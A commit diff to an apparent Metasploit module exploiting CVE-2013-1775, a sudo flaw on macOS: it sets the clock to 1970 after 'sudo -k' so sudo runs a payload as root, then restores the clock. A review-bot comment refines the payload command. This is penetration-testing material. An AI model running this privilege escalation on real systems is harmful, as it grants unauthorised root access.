Merge pull request #2 from jvazquez-r7/test_osx

merge in @jvazquez-r7's fixes for osx sudo module
bug/bundler_fix
jvennix-r7 2013-08-23 17:06:26 -07:00
commit 155f336b6f
1 changed files with 87 additions and 31 deletions


@ -37,32 +37,41 @@ class Metasploit3 < Msf::Exploit::Local
ran the sudo command. ran the sudo command.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => [ 'joev <jvennix[at]rapid7.com>'], 'Author' =>
'Platform' => [ 'osx' ],
'SessionTypes' => [ 'shell', 'meterpreter'],
'References' => [['CVE', '2013-1775']],
'Platform' => 'osx',
'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],
'Targets' => [
[ [
'Mac OS X x86 (Native Payload)', { 'Todd C. Miller', # Vulnerability discovery
'joev <jvennix[at]rapid7.com>' # Metasploit module
],
'References' =>
[
['CVE', '2013-1775'],
['OSVDB', '90677']
],
'Platform' => 'osx',
'Arch' => [ ARCH_X86, ARCH_X86_64, ARCH_CMD ],
'SessionTypes' => [ 'shell', 'meterpreter'],
'Targets' => [
[ 'Mac OS X x86 (Native Payload)',
{
'Platform' => 'osx', 'Platform' => 'osx',
'Arch' => ARCH_X86 'Arch' => ARCH_X86
} }
], [ ],
'Mac OS X x64 (Native Payload)', { [ 'Mac OS X x64 (Native Payload)',
{
'Platform' => 'osx', 'Platform' => 'osx',
'Arch' => ARCH_X64 'Arch' => ARCH_X86_64
} }
], [ ],
'CMD', { [ 'CMD',
{
'Platform' => 'unix', 'Platform' => 'unix',
'Arch' => ARCH_CMD 'Arch' => ARCH_CMD
} }
] ]
], ],
'DefaultOptions' => { "PrependFork" => true }, 'DefaultTarget' => 0,
'DefaultTarget' => 0 'DisclosureDate' => 'Feb 28 2013'
)) ))
end end
@ -73,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Local
sudo_vn = $1 sudo_vn = $1
sudo_vn_parts = sudo_vn.split(/[\.p]/).map(&:to_i) sudo_vn_parts = sudo_vn.split(/[\.p]/).map(&:to_i)
# check vn between 1.6.0 through 1.7.10p6 # check vn between 1.6.0 through 1.7.10p6
# and 1.8.0 through 1.8.6p6 # and 1.8.0 through 1.8.6p6
if not vn_bt(sudo_vn, VULNERABLE_VERSION_RANGES) if not vn_bt(sudo_vn, VULNERABLE_VERSION_RANGES)
print_error "sudo version #{sudo_vn} not vulnerable." print_error "sudo version #{sudo_vn} not vulnerable."
return Exploit::CheckCode::Safe return Exploit::CheckCode::Safe
@ -84,8 +93,7 @@ class Metasploit3 < Msf::Exploit::Local
end end
if not user_in_admin_group? if not user_in_admin_group?
print_error "sudo version is vulnerable, but user is not in the "+ print_error "sudo version is vulnerable, but user is not in the admin group (necessary to change the date)."
"admin group (necessary to change the date)."
Exploit::CheckCode::Safe Exploit::CheckCode::Safe
end end
# one root for you sir # one root for you sir
@ -108,30 +116,48 @@ class Metasploit3 < Msf::Exploit::Local
print_status("Payload dropped and registered for cleanup") print_status("Payload dropped and registered for cleanup")
end end
print_status("Executing: #{SYSTEMSETUP_PATH} -gettime")
@time = cmd_exec("#{SYSTEMSETUP_PATH} -gettime").match(/^time: (.*)$/i)[1] @time = cmd_exec("#{SYSTEMSETUP_PATH} -gettime").match(/^time: (.*)$/i)[1]
print_status("Executing: #{SYSTEMSETUP_PATH} -getdate")
@date = cmd_exec("#{SYSTEMSETUP_PATH} -getdate").match(/^date: (.*)$/i)[1] @date = cmd_exec("#{SYSTEMSETUP_PATH} -getdate").match(/^date: (.*)$/i)[1]
print_status("Executing: #{SYSTEMSETUP_PATH} -getusingnetworktime")
@networked = cmd_exec("#{SYSTEMSETUP_PATH} -getusingnetworktime") =~ (/On$/) @networked = cmd_exec("#{SYSTEMSETUP_PATH} -getusingnetworktime") =~ (/On$/)
print_status("Executing: #{SYSTEMSETUP_PATH} -gettimezone")
@zone = cmd_exec("#{SYSTEMSETUP_PATH} -gettimezone").match(/^time zone: (.*)$/i)[1] @zone = cmd_exec("#{SYSTEMSETUP_PATH} -gettimezone").match(/^time zone: (.*)$/i)[1]
@network_server = if @networked @network_server = if @networked
print_status("Executing: #{SYSTEMSETUP_PATH} -getnetworktimeserver")
cmd_exec("#{SYSTEMSETUP_PATH} -getnetworktimeserver").match(/time server: (.*)$/i)[1] cmd_exec("#{SYSTEMSETUP_PATH} -getnetworktimeserver").match(/time server: (.*)$/i)[1]
end end
print_warning("Cleanup to be done in case something goes really bad")
print_warning("Execute: #{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}")
print_warning("Execute: #{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}")
print_warning("Execute: #{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}")
if @networked
print_warning("Execute: #{SYSTEMSETUP_PATH} -setusingnetworktime On")
if @network_server
print_warning("Execute: #{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")
end
end
run_sudo_cmd run_sudo_cmd
end end
end end
def cleanup def cleanup
return if @_cleaning_up print_status("cleanup callback")
@_cleaning_up = true if not @_cleaning_up
@_cleaning_up = true
do_cleanup
end
super
end
print_status("Resetting system clock to original values") if @time def on_new_session(session)
cmd_exec("#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}") unless @zone.nil? print_status("on_new_session callback")
cmd_exec("#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}") unless @date.nil? if not @_cleaning_up
cmd_exec("#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}") unless @time.nil? @_cleaning_up = true
if @networked do_cleanup
cmd_exec("#{SYSTEMSETUP_PATH} -setusingnetworktime On")
unless @network_server.nil?
cmd_exec("#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")
end
end end
super super
end end
@ -145,9 +171,17 @@ class Metasploit3 < Msf::Exploit::Local
['sudo', '-S', payload.encoded].join(' ') ['sudo', '-S', payload.encoded].join(' ')
end end
# to prevent the password prompt from destroying session # Ugly stuff just to test CMD tar isnt running because of the env variables not being preserved
sudo_cmd = 'echo "" | '+sudo_cmd_raw sudo_cmd_raw.gsub!(/python/, "/usr/bin/python")
sudo_cmd_raw.gsub!(/ruby/, "/usr/bin/ruby")
sudo_cmd_raw.gsub!(/sh/, "/bin/sh")
## to prevent the password prompt from destroying session
sudo_cmd = 'echo "" | ' + sudo_cmd_raw + ' & sleep 5'
print_status("Executing: sudo -k; \n"+
"#{SYSTEMSETUP_PATH} -setusingnetworktime Off -setdate 01:01:1970"+
" -settimezone GMT -settime 00:00")
cmd_exec( cmd_exec(
"sudo -k; \n"+ "sudo -k; \n"+
"#{SYSTEMSETUP_PATH} -setusingnetworktime Off -setdate 01:01:1970"+ "#{SYSTEMSETUP_PATH} -setusingnetworktime Off -setdate 01:01:1970"+
@ -166,6 +200,28 @@ class Metasploit3 < Msf::Exploit::Local
print_good output print_good output
end end
def do_cleanup
print_status("Resetting system clock to original values") if @time
print_status("Executing: #{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}")
cmd_exec("#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}") unless @zone.nil?
print_status("Executing: #{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}")
cmd_exec("#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}") unless @date.nil?
print_status("Executing: #{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}")
cmd_exec("#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}") unless @time.nil?
if @networked
print_status("Executing: #{SYSTEMSETUP_PATH} -setusingnetworktime On")
cmd_exec("#{SYSTEMSETUP_PATH} -setusingnetworktime On")
unless @network_server.nil?
print_status("Executing: #{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")
cmd_exec("#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")
end
end
end
# helper methods for accessing datastore # helper methods for accessing datastore
def using_native_target?; target.name =~ /native/i; end def using_native_target?; target.name =~ /native/i; end
def using_cmd_target?; target.name =~ /cmd/i; end def using_cmd_target?; target.name =~ /cmd/i; end
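Review bot: The three `gsub!` calls added in run_sudo_cmd rewrite every substring match, not just bare interpreter names: `sudo_cmd_raw.gsub!(/sh/, "/bin/sh")` turns `bash` into `ba/bin/sh` and `ssh` into `s/bin/sh`, and `/python/` or `/ruby/` applied to a payload that already carries an absolute path would yield `/usr/bin//usr/bin/python`. The commit's own comment calls this "ugly stuff just to test", so it should at least be anchored so only a bare command word is rewritten and an existing path prefix is left alone. A lookbehind excluding `/` and word characters plus a trailing `\b` does that with one table instead of three regexes. run_sudo_cmd starts and ends outside this hunk, so I cannot see how sudo_cmd_raw is assembled for the native targets.
```ruby
# sudo drops PATH, so make bare interpreter names absolute; the lookbehind
# leaves already-absolute paths and substrings like "bash"/"ssh" untouched.
{ 'python' => '/usr/bin/python', 'ruby' => '/usr/bin/ruby', 'sh' => '/bin/sh' }.each do |bin, path|
  sudo_cmd_raw.gsub!(/(?<![\w\/])#{bin}\b/, path)
end
# … unchanged: sudo_cmd construction and the sudo -k / systemsetup date reset …
```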